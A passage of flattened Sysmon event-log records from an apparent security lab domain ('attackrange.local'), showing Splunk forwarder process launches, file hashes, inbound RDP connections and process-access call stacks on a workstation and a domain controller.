Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976837Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:37.734{69CF5F33-88AD-6151-8779-00000000FD01}876C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976836Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:37.733{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2378847D51F6AFC7113E84CC3799F6C,SHA256=975C8DBF4046A5D7067D905490D7126BD638DB7089866EC008F63BE617A5D124,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048223Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:38.638{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56E14B69152476DA31434C1CCE56ED41,SHA256=75F964E7FF00AC124030A86C1499EC30C470527481E1CA1DA86893274BE80A13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976851Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:38.749{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D36D705E57D42F511B8EFB49A16D2352,SHA256=3D9B0135B86E94D604B85EB650073FC1195F7E552D0D75D1B031A9839EB3A1A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976850Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:38.749{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A69B7423167E50A6BDB4207FEBB21752,SHA256=0BFA75781C48347363ACFC6BCC771E4F49CF61129ADC4E671CF3D04074F51108,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048222Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:36.637{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64083-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001048221Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:36.100{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49237-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x80000000000000001048220Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:35.954{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65054-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000976854Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:39.968{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5E0CFBF311541E0086CC950C434C013D,SHA256=30C7142796DA6FF1C99DAAC246F76A031C4E846E05871BF8E2548D43568D1E3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976853Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:39.765{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F70D487BB1B75D2C001173EA208B256,SHA256=24D1591837C9B1E13F2262F6377556C75995AB6589534BC854E6F5C164400684,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048225Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:39.752{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C536666163C4872C5B320FC107C4CAE3,SHA256=AD924A158803B14BE1A4876C4F610A2AAC31FC46F63B9EB8A46063CC5383430A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048224Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:39.185{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=1B26A23067FB8B657D472F48BCBBD64B,SHA256=35B6493874EAF6F623C20FB646055BC38CE69CDDA5F4E92E8D854337DB630F17,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976852Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:35.585{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-51815-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976856Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:40.780{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E9AE5C700A487F0DE8BEA108578A3B7,SHA256=55561F8298140F81C7E44570D04375B1CEC615F1E6A6154EA1644C12F583A78C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048227Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:40.885{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CAD07BCEBAAAE9921930293936DFA05,SHA256=B5A8EDAF4FADF3D419BCEC82C24FABAC10FAC6A63C88DBC78B131EDFD7F779E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976855Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:36.659{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49833-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001048226Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:37.914{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49238-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048228Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:41.903{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D73E4EFCEE76DD4A4D00C9E0FB36D35,SHA256=D2C8C04E6EEEA680EC7CCAE9BFEC748BBD08DEBCF15796D85F912206F1DB83E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976857Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:41.780{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AECAA202434D64C0D895799D1E29D7C9,SHA256=211DBAE94C32F7746D07ACC5499E104173AADCD0CEC5812D1C9757423C4665C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976860Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:42.784{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=559715095D294CF3BD239BE8D8861D99,SHA256=254F717A8E1847AC92D2A1034907B8F560CCEE96BBB397FFF421303324CB9F94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048229Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:42.918{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F04AFAE9EF6E9E2D3243AB22055CAAB4,SHA256=2B60EFFC5DE6001828D276E11C4F57D0F03B1190F6B9E337FB3C83F5DF03F228,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976859Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:42.644{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C14092917984FEA1550767CDF71E1486,SHA256=2EBB8208DAB638731D1EE07D85B3649C292CBBA7F70647CC11B3571400FC7E37,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976858Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:38.800{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59273-false10.0.1.12-8000- 23542300x8000000000000000976862Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:43.800{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47DAC8E762C58F91A409223EE51BC637,SHA256=20B1F220C8DDAEE8F80D1890268AD0E43185939C04AE57B558E5E2906B5116E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048230Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:43.933{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=779302C0F1108ED18DEBEA01B6664A76,SHA256=AB0E475099CE65E9C55AE06DCAEA90DDE124FD18BCBB12E8E6B2B57D233095EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976861Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:39.563{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-22213-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976863Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:44.816{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B876DCEBDF241BDED7A11318F6E627BB,SHA256=16CB7C8EA1AFF3C092134B8E11B5200B69C9EC9120855AF26D5892B3BFEA86E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048239Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:44.748{5EBD8912-88B4-6151-F379-00000000FC01}41206540C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048238Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:44.585{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-88B4-6151-F379-00000000FC01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048237Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:44.585{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048236Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:44.585{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048235Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:44.585{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048234Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:44.585{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048233Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:44.585{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-88B4-6151-F379-00000000FC01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048232Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:44.585{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-88B4-6151-F379-00000000FC01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048231Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:44.565{5EBD8912-88B4-6151-F379-00000000FC01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976866Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:45.831{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C92F4E0A5B9BB14E05D29590DA62C904,SHA256=8479D8FD53B5AF4B4BF83EBB765E4CBF5EE64D8E509EE6CC852BD7D7E13129F9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048258Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.732{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-88B5-6151-F579-00000000FC01}6072C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048257Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.732{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048256Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.732{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048255Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.732{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048254Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 